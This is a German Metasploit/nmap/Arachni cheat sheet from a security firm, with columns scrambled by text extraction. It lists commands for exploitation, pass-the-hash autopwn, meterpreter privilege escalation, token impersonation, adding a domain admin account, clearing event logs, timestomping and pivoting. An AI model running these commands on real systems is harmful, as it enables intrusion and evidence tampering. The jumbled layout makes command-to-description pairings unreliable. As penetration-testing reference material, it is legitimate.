Vorbereitungsarbeiten und Bedienung des Frameworks Modulanwendung
msf > set Abfrage des lokalen Datastores: msf > search type:auxiliary <Suchbegriff> Ein Modul suchen msf > setg Abfrage des globalen Datastores msf > setg RHOST 10.1.1.1 Setzen einer globalen Option msf > use auxiliary/scanner/http/enum_wayback Ein Modul auswählen msf > unset RHOST Bestehende Optionen zurück setzen msf auxiliary(enum_wayback) > info Modulinformationen abfragen msf > hosts Datenbankabfragen um msf auxiliary(enum_wayback) > show options msf > notes Informationen zu ermittelten msf auxiliary(enum_wayback) > show advanced msf > services Hosts, Services, Schwachstellen msf > vulns und Credentials abzufragen msf exploit(ms08_067_netapi) > show payloads Mögliche Payloads, Encoder und msf > creds msf exploit(ms08_067_netapi) > show encoder Ziele eines Moduls anzeigen msf > workspace -a workspace Workspace hinzufügen msf exploit(ms08_067_netapi) > show targets msf > workspace Workspaces anzeigen msf > workspace -d workspace Workspace löschen msf auxiliary(enum_wayback) > run Modul anwenden und die Check- msf > set ConsoleLogging yes Logging vollständig aktivieren msf exploit(ms08_067_netapi) > exploit Funktion nutzen msf > set SessionLogging yes msf exploit(ms08_067_netapi) > check msf > set TimestampOutput yes Webapplikationen analysieren msf > set LogLevel 5 msf > use Webseitenstruktur erkennen msf > spool auxiliary/scanner/http/crawler /root/.msf4/logs/console.log msf > wmap_sites l Webseiten auflisten msf > save Einstellungen speichern msf > wmap_sites -s 10.8.28.24 Struktur einer Webseite msf > db_export h Ergebnisse exportieren darstellen msf > wmap_targets l Ziele auflisten und Session Mangement und Post Exploitation Phase msf > wmap_targets -t definieren msf > sessions v Details aller Sessions anzeigen 10.8.28.24 msf > sessions -i <Session ID> In eine Session wechseln msf > wmap_run e Webapplikation analysieren msf > sessions -c ipconfig Auf allen Sessions einen Befehl absetzen msf > sessions -s checkvm Auf allen Sessions ein Meterpreter Script absetzen Db_autopwn mit Pass the Hash einsetzen msf > search type:post Post Exploitation Scripte suchen msf > setg SMBUser Administrator Erst smb_version nutzen um meterpreter > run <Tab>+<Tab> Post Exploitation Module innerhalb einer Meterpreter meterpreter > run <Modulpfad+Modulname> Session anwenden msf > setg SMBPass Port 445 zu ermitteln. msf > use <Modul> Post Exploitation Module außerhalb einer Meterpreter b2e74449a<snip>:d4e80e6<snip> Den User global setzen, msf > show options Session anwenden msf > db_autopwn -e -r -p -PI445 den Passwort Hash global msf > set <Option> msf > run -m psexec seten. meterpreter > run winenum -h Windows Enumeration db_autopwn mit einer Regular Expression auf das meterpreter > run event_manager -h Event Manager Modul -c <opt> Clear a given Event Log (or ALL if no Modul einschränken und argument specified) zudem noch auf einen Port meterpreter > timestomp ping.exe v Anzeigen der MACE Zeiten: einschränken meterpreter > timestomp ping.exe -a "02/24/2011 Anpassen der MACE Zeiten: 16:57:50"
Contact: Michael Messner michael.messner@integralis.com
Metasploit Cheat Sheet Privilege Escalation Kleine Metasploit Helfer meterpreter > use priv MS10-015 und von Admin zu System meterpreter > getsystem h root@bt: /MSF-Path/msf3/tools# Zielsysteme suchen post/windows/escalate/bypassuac Weitere Escalation Module ./module_targets.rb | grep "Windows.*2003" post/windows/escalate/ms10_073_kbdlayout Zielports darstellen post/windows/escalate/ms10_092_schelevator root@bt: /MSF-Path/msf3/tools# ./module_ports.rb post/windows/escalate/net_runtime_modify root@bt: /MSF-Path/msf3/tools# Disclosure Date post/windows/escalate/screen_unlock ausgeben ./module_disclodate.rb post/windows/escalate/service_permissions root@bt: /MSF-PATH/msf3/tools# Lizenzen ausgeben meterpreter > use incognito Domain Privilege Escalation mit meterpreter > list_tokens u Incognito ./module_license.rb meterpreter > impersonate_token Payloads mit deren root@bt: /MSF-PATH/msf3/tools# DOMAIN\\administrator Größe ausgeben C:\WINNT\system32>net user metasploit PASSWORD Domain Benutzer auf der Windows Shell ./payload_lengths.rb | grep windows\/Meterpreter /add /domain anlegen Pivoting C:\WINNT\system32>net group Organisations-Admins metasploit /add /domain meterpreter > run netenum -ps -r Weitere Netzwerksegmente 192.168.111.0/24 enumerieren meterpreter > run arp_scanner -r Nmap Cheat Sheet 192.168.111.0/24 nmap sS 192.168.1.1 Einfacher Synscan meterpreter > portfwd add -l Port 3389 von entfernten nmap sS iL /root/Nmap- Einfacher Synscan auf Basis einer 3389 -p 3389 -r 192.168.111.50 Netzwerksegment weiterleiten Scanfile.txt Adressliste, die aus einer Textdatei meterpreter > portfwd list geladen wird msf > route add 192.168.111.0 Eine statische Route innerhalb nmap v sS 192.168.1.1 Synscan im Verbose-Mode 255.255.255.0 5 von Metasploit einrichten nmap v sS p0-65535 Synscan über alle 65535 Ports msf > route print 192.168.1.1 msf > load auto_add_route Automatisches Einrichten von nmap v sS O 192.168.1.1 Synscan mit Erkennung des Betriebssystems meterpreter > run autoroute -s neuen Routen nmap v sS -A 192.168.1.1 Portscan mit Erkennung des 192.168.111.0/24 Betriebssystems, der Serviceversionen, Durchführung eines Traceroute und des Skriptscans Arachni einsetzen nmap -p445 --script=smb-check- Portscan auf Port 445 mit dem Einsatz des root@bt:~# arachni http://10.8.28.8/arachni-test -- Arachni Scanvorgang starten vulns.nse --script-args=unsafe=1 NSE-Skripts zur Erkennung diverser http-req-limit=5 --report=afr:outfile=arachni- 10.8.28.0/24 Schwachstellen testsite.afr nmap v sSV -O script=all p0- Portscan auf alle Ports, mit OS- root@bt:~# arachni_web_autostart Arachni Weboberfläche 65535 192.168.1.1 Detection, Servicedetection und allen starten Skripten root@bt:~# arachni --repload=arachni-testsite.afr - HTML Report erstellen msf > db_nmap v -sSV -p445 Nmap innerhalb der Metasploit Konsole -report=html:outfile=arachni-testsite.html 10.8.28.0/24 ausführen root@bt:~# arachni --repload=arachni-testsite.afr - Metasploit Report erstellen -report=metareport:outfile=arachni-testsite.msf msf > load arachni Arachni Metasploit Plugin Robert-Bürkle-Straße 3 msf > arachni_load /root/metasploit/arachni- nutzen testsite.msf D-85737 Ismaning msf > arachni_autopwn -a m Integralis Deutschland GmbH Tel.: +49 (0)89 945 73 0 Contact: Michael Messner michael.messner@integralis.com